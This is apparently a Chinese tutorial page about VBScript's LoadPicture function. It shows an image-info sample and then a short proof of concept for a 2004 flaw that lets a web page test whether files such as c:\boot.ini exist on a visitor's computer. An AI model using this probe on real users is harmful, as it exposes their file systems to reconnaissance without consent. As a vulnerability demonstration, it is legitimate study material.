示例:

<title>LoadPicture函数</title> <form name=”frm”> 选择图片<input type=”file” name=”pic” onChange=”GetPicInfor()” > </form> <script language=”vbscript”> Sub GetPicInfor() dim objpic,iWidth,iHeight dim pictype,picpath picpath=document.frm.pic.value set objpic=Loadpicture(picpath) iWidth = round(objpic.width / 26.4583) ‘26.4583是像素值 iHeight = round(objpic.height / 26.4583) select case objpic.type case 0 pictype = “None” case 1 pictype = “Bitmap” case 2 pictype = “Metafile” case 3 pictype = “Icon” case 4 pictype = “Win32-enhanced metafile” end select document.write “你选择了图片”&picpath document.write “<li>长度:”&iHeight&”</li>” document.write “<li>宽度:”&iwidth&”</li>” document.write “<li>类型:”&pictype&”</li>” End Sub </script>

[Ctrl+A 全选 注:
引入外部Js需再刷新一下页面才能执行]

不过这个函数有个漏洞,可以探测电脑上存在的文件名。2004年的漏洞,微软现在也没补,示例:

<form onsubmit=”doIt(this);return false”> <input name=”filename” value=”c:\boot.ini” size=”80″ type=”text”><input type=”submit”> </form> <script language=”vbscript”> Sub loadIt(filename) LoadPicture(filename) End Sub </script> <script language=”javascript”> function doIt(form) { try { loadIt(form.filename.value); } catch(e) { result = e.number; } if (result != -2146827856) { alert(‘file exists’); } else { alert(‘file does not exist’); } } </script>

[Ctrl+A 全选 注:
引入外部Js需再刷新一下页面才能执行]
您可能感兴趣的文章:

声明:本站(华域联盟www.cnhackhy.com)所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。